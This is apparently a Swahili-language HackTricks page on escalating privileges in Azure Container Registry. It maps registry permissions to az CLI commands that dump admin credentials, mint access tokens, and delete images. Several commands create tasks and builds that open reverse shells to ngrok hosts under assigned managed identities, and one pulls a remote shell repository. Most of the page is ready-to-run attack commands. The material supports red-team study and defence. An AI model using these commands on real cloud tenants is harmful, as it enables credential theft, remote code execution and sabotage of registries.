Az - Azure Container Registry Privesc

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure Container Registry

Kwa maelezo zaidi angalia:

Az - Container Registry

Microsoft.ContainerRegistry/registries/listCredentials/action

Ruhusa hii inamruhusu mtumiaji kuorodhesha akiba za usimamizi za ACR. Hii ni muhimu ili kupata ufikiaji kamili juu ya akiba

bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>/listCredentials?api-version=2023-11-01-preview"

Ikiwa haki za msimamizi hazijawashwa, utahitaji pia ruhusa Microsoft.ContainerRegistry/registries/write ili kuziwasha kwa:

bash
az rest --method PATCH --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}'

Microsoft.ContainerRegistry/registries/tokens/write, Microsoft.ContainerRegistry/registries/generateCredentials/action

Hizi ruhusa zinamruhusu mtumiaji kuunda token mpya yenye nywila za kufikia rejista.

Ili kutumia az cli kuunda kama katika mfano ufuatao, utahitaji pia ruhusa Microsoft.ContainerRegistry/registries/read, Microsoft.ContainerRegistry/registries/scopeMaps/read, Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read, Microsoft.ContainerRegistry/registries/tokens/read

bash
az acr token create \
--registry <registry-name> \
--name <token-name> \
--scope-map _repositories_admin

Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action, Microsoft.ContainerRegistry/registries/scheduleRun/action, Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action

Hizi ruhusa zinamruhusu mtumiaji kujenga na kuendesha picha katika rejista. Hii inaweza kutumika kutekeleza msimbo katika kontena.

[!WARNING] Hata hivyo, picha itatekelezwa katika mazingira yaliyofungwa na bila ufikiaji wa huduma ya metadata. Hii inamaanisha kwamba kontena haitaweza kupata metadata ya mfano hivyo hii si ya manufaa sana katika kupandisha mamlaka.

bash
# Build
echo 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp//2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile
az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null

Microsoft.ContainerRegistry/registries/tasks/write

Hii ni ruhusa kuu inayoruhusu kuunda na kusasisha kazi katika rejista. Hii inaweza kutumika kutekeleza msimbo ndani ya kontena lenye utambulisho uliohifadhiwa ndani yake.

Hii ni mfano wa jinsi ya kutekeleza shell ya reverse katika kontena lenye utambulisho wa system managed uliohifadhiwa ndani yake:

bash
az acr task create \
--registry <registry-name> \
--name reverse-shell-task \
--image rev/shell:v1 \
--file ./Dockerfile \
--context https://github.com/carlospolop/Docker-rev.git \
--assign-identity \
--commit-trigger-enabled false \
--schedule "*/1 * * * *"

Njia nyingine ya kupata RCE kutoka kwa kazi bila kutumia hifadhi ya nje ni kutumia amri az acr task create pamoja na bendera --cmd. Hii itakuruhusu kuendesha amri ndani ya kontena. Kwa mfano, unaweza kuendesha shell ya kurudi kwa amri ifuatayo:

bash
az acr task create \
--registry <registry-name> \
--name reverse-shell-task-cmd \
--image rev/shell2:v1 \
--cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \
--schedule "*/1 * * * *" \
--context /dev/null \
--commit-trigger-enabled false \
--assign-identity

tip

Kumbuka kwamba ili kupewa kitambulisho kinachosimamiwa na mfumo hauhitaji ruhusa maalum, ingawa inapaswa kuwa imewezeshwa kabla katika rejista na kupewa ruhusa fulani ili iwe na manufaa.

Ili kupewa kitambulisho kinachosimamiwa na mtumiaji pia unahitaji ruhusa Microsoft.ManagedIdentity/userAssignedIdentities/assign/action kufanya:

bash
az acr task create \
--registry <registry-name> \
--name reverse-shell-task \
--image rev/shell:v1 \
--file ./Dockerfile \
--context https://github.com/carlospolop/Docker-rev.git \
--assign-identity \[system\] "/subscriptions/<subscription-id>>/resourcegroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>" \
--commit-trigger-enabled false \
--schedule "*/1 * * * *"

Ili kusasisha repo ya kazi iliyopo unaweza kufanya:

bash
az acr task update \
--registry <registry-name> \
--name reverse-shell-task \
--context https://github.com/your-user/your-repo.git

Microsoft.ContainerRegistry/registries/importImage/action

Kwa ruhusa hii inawezekana kuagiza picha kwenye azure registry, hata bila kuwa na picha hiyo kwenye kifaa. Hata hivyo, kumbuka kwamba huwezi kuagiza picha yenye lebo ambayo tayari ipo kwenye registry.

bash
# Push with az cli
az acr import \
--name <registry-name> \
--source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import

Ili kuondoa au kufuta lebo maalum ya picha kutoka kwenye rejista unaweza kutumia amri ifuatayo. Hata hivyo, kumbuka kwamba utahitaji mtumiaji au token yenye idhini ya kutosha kufanya hivyo:

bash
az acr repository untag \
--name <registry-name> \
--image <image-name>:<tag>

az acr repository delete \
--name <registry-name> \
--image <image-name>:<tag>

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks